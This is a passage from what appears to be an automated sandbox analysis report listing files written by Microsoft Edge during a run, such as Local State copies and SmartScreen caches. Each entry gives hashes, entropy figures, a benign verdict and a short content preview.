                                                                                                                                          Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF33de5.TMP (copy)

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:JSON data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):44137
                                                                                                                                          Entropy (8bit):6.090776782579777
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBMCwuF9hDO6vP6O+Wtbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEQ6/tbz8hu3VlXr4CRo1
                                                                                                                                          MD5:1AF0B68F6B69583321EA260D915383B4
                                                                                                                                          SHA1:2371D22CAF4D75D1042CD9EB3ED60393E770AA2F
                                                                                                                                          SHA-256:9F918F6A57C456F8D5FA6649FE01C6ACBAF4DD6EB51939ED7607D1594411C608
                                                                                                                                          SHA-512:7CD5840D7F377A794DD9699B68DB05A57F0673AD31E442D294E69BE3B730D37196819F30519AB45B9287B389D63FCF21232BEC37E7CFB256FF522B4731271F09
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF34334.TMP (copy)

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:JSON data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):44137
                                                                                                                                          Entropy (8bit):6.090776782579777
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBMCwuF9hDO6vP6O+Wtbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEQ6/tbz8hu3VlXr4CRo1
                                                                                                                                          MD5:1AF0B68F6B69583321EA260D915383B4
                                                                                                                                          SHA1:2371D22CAF4D75D1042CD9EB3ED60393E770AA2F
                                                                                                                                          SHA-256:9F918F6A57C456F8D5FA6649FE01C6ACBAF4DD6EB51939ED7607D1594411C608
                                                                                                                                          SHA-512:7CD5840D7F377A794DD9699B68DB05A57F0673AD31E442D294E69BE3B730D37196819F30519AB45B9287B389D63FCF21232BEC37E7CFB256FF522B4731271F09
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF36aa2.TMP (copy)

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:JSON data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):44137
                                                                                                                                          Entropy (8bit):6.090776782579777
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBMCwuF9hDO6vP6O+Wtbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEQ6/tbz8hu3VlXr4CRo1
                                                                                                                                          MD5:1AF0B68F6B69583321EA260D915383B4
                                                                                                                                          SHA1:2371D22CAF4D75D1042CD9EB3ED60393E770AA2F
                                                                                                                                          SHA-256:9F918F6A57C456F8D5FA6649FE01C6ACBAF4DD6EB51939ED7607D1594411C608
                                                                                                                                          SHA-512:7CD5840D7F377A794DD9699B68DB05A57F0673AD31E442D294E69BE3B730D37196819F30519AB45B9287B389D63FCF21232BEC37E7CFB256FF522B4731271F09
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF4533d.TMP (copy)

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:JSON data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):44137
                                                                                                                                          Entropy (8bit):6.090776782579777
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBMCwuF9hDO6vP6O+Wtbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEQ6/tbz8hu3VlXr4CRo1
                                                                                                                                          MD5:1AF0B68F6B69583321EA260D915383B4
                                                                                                                                          SHA1:2371D22CAF4D75D1042CD9EB3ED60393E770AA2F
                                                                                                                                          SHA-256:9F918F6A57C456F8D5FA6649FE01C6ACBAF4DD6EB51939ED7607D1594411C608
                                                                                                                                          SHA-512:7CD5840D7F377A794DD9699B68DB05A57F0673AD31E442D294E69BE3B730D37196819F30519AB45B9287B389D63FCF21232BEC37E7CFB256FF522B4731271F09
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF4b041.TMP (copy)

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:JSON data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):44137
                                                                                                                                          Entropy (8bit):6.090776782579777
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBMCwuF9hDO6vP6O+Wtbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEQ6/tbz8hu3VlXr4CRo1
                                                                                                                                          MD5:1AF0B68F6B69583321EA260D915383B4
                                                                                                                                          SHA1:2371D22CAF4D75D1042CD9EB3ED60393E770AA2F
                                                                                                                                          SHA-256:9F918F6A57C456F8D5FA6649FE01C6ACBAF4DD6EB51939ED7607D1594411C608
                                                                                                                                          SHA-512:7CD5840D7F377A794DD9699B68DB05A57F0673AD31E442D294E69BE3B730D37196819F30519AB45B9287B389D63FCF21232BEC37E7CFB256FF522B4731271F09
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Nurturing\campaign_history

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 6
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):20480
                                                                                                                                          Entropy (8bit):0.6773696719930975
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:12:TLpUAFUxOUDaabZXiDiIF8izX4fhhdWeci2oesJaYi3islRud6zcQAJmdngzQdoO:TLiOUOq0afDdWec9sJhOs3fsuZ7J5fc
                                                                                                                                          MD5:6FFCCB198DC6B17E165460E6E246B03C
                                                                                                                                          SHA1:014A46B0E6E84089E1C20FA232F54CA737D5F023
                                                                                                                                          SHA-256:D1B2EC8C9906C3418837FFB8E116AA59C026DE2D67B2AFDA956F14D0DC3851AF
                                                                                                                                          SHA-512:846AE3D0A49A14BF82203A0FEDAD6E794F7E68C22A40EE0E014FEA99DFC676FAE4AFEB2C56F324E4361E83A35458C63E2ABAA7B28B6D23B20FA29EF47CBE87B3
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\customSettings

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):47
                                                                                                                                          Entropy (8bit):4.3818353308528755
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3:2jRo6jhM6ceYcUtS2djIn:5I2uxUt5Mn
                                                                                                                                          MD5:48324111147DECC23AC222A361873FC5
                                                                                                                                          SHA1:0DF8B2267ABBDBD11C422D23338262E3131A4223
                                                                                                                                          SHA-256:D8D672F953E823063955BD9981532FC3453800C2E74C0CC3653D091088ABD3B3
                                                                                                                                          SHA-512:E3B5DB7BA5E4E3DE3741F53D91B6B61D6EB9ECC8F4C07B6AE1C2293517F331B716114BAB41D7935888A266F7EBDA6FABA90023EFFEC850A929986053853F1E02
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:customSettings_F95BA787499AB4FA9EFFF472CE383A14

                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\customSettings_F95BA787499AB4FA9EFFF472CE383A14

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:JSON data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):35
                                                                                                                                          Entropy (8bit):4.014438730983427
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3:YDMGA2ADH/AYKEqsYq:YQXT/bKE1F
                                                                                                                                          MD5:BB57A76019EADEDC27F04EB2FB1F1841
                                                                                                                                          SHA1:8B41A1B995D45B7A74A365B6B1F1F21F72F86760
                                                                                                                                          SHA-256:2BAE8302F9BD2D87AE26ACF692663DF1639B8E2068157451DA4773BD8BD30A2B
                                                                                                                                          SHA-512:A455D7F8E0BE9A27CFB7BE8FE0B0E722B35B4C8F206CAD99064473F15700023D5995CC2C4FAFDB8FBB50F0BAB3EC8B241E9A512C0766AAAE1A86C3472C589FFD
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:{"forceServiceDetermination":false}

                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\edgeSettings

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):81
                                                                                                                                          Entropy (8bit):4.3439888556902035
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3:kDnaV6bVsFUIMf1HDOWg3djTHXoSWDSQ97P:kDYaoUIe1HDM3oskP
                                                                                                                                          MD5:177F4D75F4FEE84EF08C507C3476C0D2
                                                                                                                                          SHA1:08E17AEB4D4066AC034207420F1F73DD8BE3FAA0
                                                                                                                                          SHA-256:21EE7A30C2409E0041CDA6C04EEE72688EB92FE995DC94487FF93AD32BD8F849
                                                                                                                                          SHA-512:94FC142B3CC4844BF2C0A72BCE57363C554356C799F6E581AA3012E48375F02ABD820076A8C2902A3C6BE6AC4D8FA8D4F010D4FF261327E878AF5E5EE31038FB
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1

                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:JSON data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):130439
                                                                                                                                          Entropy (8bit):3.80180718117079
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:1536:RlIyFAMrwvaGbyLWzDr6PDofI8vsUnPRLz+PMh:weWGP7Eh
                                                                                                                                          MD5:EB75CEFFE37E6DF9C171EE8380439EDA
                                                                                                                                          SHA1:F00119BA869133D64E4F7F0181161BD47968FA23
                                                                                                                                          SHA-256:48B11410DC937A1723BF4C5AD33ECDB286D8EC69544241BC373F753E64B396C1
                                                                                                                                          SHA-512:044C5113D877CE2E3B42CF07670620937ED7BE2D8B3BF2BAB085C43EF4F64598A7AC56328DDBBE7F0F3CFB9EA49D38CA332BB4ECBFEDBE24AE53B14334A30C8E
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:{.. "geoidMaps": {.. "au": "https://australia.smartscreen.microsoft.com/",.. "ch": "https://switzerland.smartscreen.microsoft.com/",.. "eu": "https://europe.smartscreen.microsoft.com/",.. "ffl4": "https://unitedstates1.ss.wd.microsoft.us/",.. "ffl4mod": "https://unitedstates4.ss.wd.microsoft.us/",.. "ffl5": "https://unitedstates2.ss.wd.microsoft.us/",.. "in": "https://india.smartscreen.microsoft.com/",.. "test": "https://eu-9.smartscreen.microsoft.com/",.. "uk": "https://unitedkingdom.smartscreen.microsoft.com/",.. "us": "https://unitedstates.smartscreen.microsoft.com/",.. "gw_au": "https://australia.smartscreen.microsoft.com/",.. "gw_ch": "https://switzerland.smartscreen.microsoft.com/",.. "gw_eu": "https://europe.smartscreen.microsoft.com/",.. "gw_ffl4": "https://unitedstates1.ss.wd.microsoft.us/",.. "gw_ffl4mod": "https://unitedstates4.ss.wd.microsoft.us/",.. "gw_ffl5": "https://unitedstates2.ss.wd.microsoft.us/",.. "gw_in": "https

                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\synchronousLookupUris

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):40
                                                                                                                                          Entropy (8bit):4.346439344671015
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3:kfKbUPVXXMVQX:kygV5
                                                                                                                                          MD5:6A3A60A3F78299444AACAA89710A64B6
                                                                                                                                          SHA1:2A052BF5CF54F980475085EEF459D94C3CE5EF55
                                                                                                                                          SHA-256:61597278D681774EFD8EB92F5836EB6362975A74CEF807CE548E50A7EC38E11F
                                                                                                                                          SHA-512:C5D0419869A43D712B29A5A11DC590690B5876D1D95C1F1380C2F773CA0CB07B173474EE16FE66A6AF633B04CC84E58924A62F00DCC171B2656D554864BF57A4
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:synchronousLookupUris_638343870221005468

                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\synchronousLookupUris_638343870221005468

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):57
                                                                                                                                          Entropy (8bit):4.556488479039065
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3:GSCIPPlzYxi21goD:bCWBYx99D
                                                                                                                                          MD5:3A05EAEA94307F8C57BAC69C3DF64E59
                                                                                                                                          SHA1:9B852B902B72B9D5F7B9158E306E1A2C5F6112C8
                                                                                                                                          SHA-256:A8EF112DF7DAD4B09AAA48C3E53272A2EEC139E86590FD80E2B7CBD23D14C09E
                                                                                                                                          SHA-512:6080AEF2339031FAFDCFB00D3179285E09B707A846FD2EA03921467DF5930B3F9C629D37400D625A8571B900BC46021047770BAC238F6BAC544B48FB3D522FB0
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:9.......murmur3.............,M.h...Z...8.\..<&Li.H..[.?m

                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\topTraffic

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):50
                                                                                                                                          Entropy (8bit):3.9904355005135823
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3:0xXF/XctY5GUf+:0RFeUf+
                                                                                                                                          MD5:E144AFBFB9EE10479AE2A9437D3FC9CA
                                                                                                                                          SHA1:5AAAC173107C688C06944D746394C21535B0514B
                                                                                                                                          SHA-256:EB28E8ED7C014F211BD81308853F407DF86AEBB5F80F8E4640C608CD772544C2
                                                                                                                                          SHA-512:837D15B3477C95D2D71391D677463A497D8D9FFBD7EB42E412DA262C9B5C82F22CE4338A0BEAA22C81A06ECA2DF7A9A98B7D61ECACE5F087912FD9BA7914AF3F
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:topTraffic_170540185939602997400506234197983529371

                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\topTraffic_170540185939602997400506234197983529371

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):575056
                                                                                                                                          Entropy (8bit):7.999649474060713
                                                                                                                                          Encrypted:true
                                                                                                                                          SSDEEP:12288:fXdhUG0PlM/EXEBQlbk19RrH76Im4u8C1jJodha:Ji80e9Rb7Tm4u8CnR
                                                                                                                                          MD5:BE5D1A12C1644421F877787F8E76642D
                                                                                                                                          SHA1:06C46A95B4BD5E145E015FA7E358A2D1AC52C809
                                                                                                                                          SHA-256:C1CE928FBEF4EF5A4207ABAFD9AB6382CC29D11DDECC215314B0522749EF6A5A
                                                                                                                                          SHA-512:FD5B100E2F192164B77F4140ADF6DE0322F34D7B6F0CF14AED91BACAB18BB8F195F161F7CF8FB10651122A598CE474AC4DC39EDF47B6A85C90C854C2A3170960
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:...._+jE.`..}....S..1....G}s..E....y".Wh.^.W.H...-...#.A...KR...9b........>k......bU.IVo...D......Y..[l.yx.......'c=..I0.....E.d...-...1 ....m../C...OQ.........qW..<:N.....38.u..X-..s....<..U.,Mi..._.......`.Y/.........^..,.E..........j@..G8..N.... ..Ea...4.+.79k.!T.-5W..!..@+..!.P..LDG.....V."....L.... .(#..$..&......C.....%A.T}....K_.S..'Q.".d....s....(j.D!......Ov..)*d0)."(..%..-..G..L.}....i.....m9;.....t.w..0....f?..-..M.c.3.....N7K.T..D>.3.x...z..u$5!..4..T.....U.O^L{.5..=E..'..;.}(|.6.:..f!.>...?M.8......P.D.J.I4.<...*.y.E....>....i%.6..Y.@..n.....M..r..C.f.;..<..0.H...F....h.......HB1]1....u..:...H..k....B.Q..J...@}j~.#...'Y.J~....I...ub.&..L[z..1.W/.Ck....M.......[.......N.F..z*.{nZ~d.V.4.u.K.V.......X.<p..cz..>*....X...W..da3(..g..Z$.L4.j=~.p.l.\.[e.&&.Y ...U)..._.^r0.,.{_......`S..[....(.\..p.bt.g..%.$+....f.....d....Im..f...W ......G..i_8a..ae..7....pS.....z-H..A.s.4.3..O.r.....u.S......a.}..v.-/..... ...a.x#./:...sS&U.().xL...pg

                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\local\uriCache

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):9
                                                                                                                                          Entropy (8bit):3.169925001442312
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3:CMzOn:CM6
                                                                                                                                          MD5:B6F7A6B03164D4BF8E3531A5CF721D30
                                                                                                                                          SHA1:A2134120D4712C7C629CDCEEF9DE6D6E48CA13FA
                                                                                                                                          SHA-256:3D6F3F8F1456D7CE78DD9DFA8187318B38E731A658E513F561EE178766E74D39
                                                                                                                                          SHA-512:4B473F45A5D45D420483EA1D9E93047794884F26781BBFE5370A554D260E80AD462E7EEB74D16025774935C3A80CBB2FD1293941EE3D7B64045B791B365F2B63
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:uriCache_

                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\local\uriCache_

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
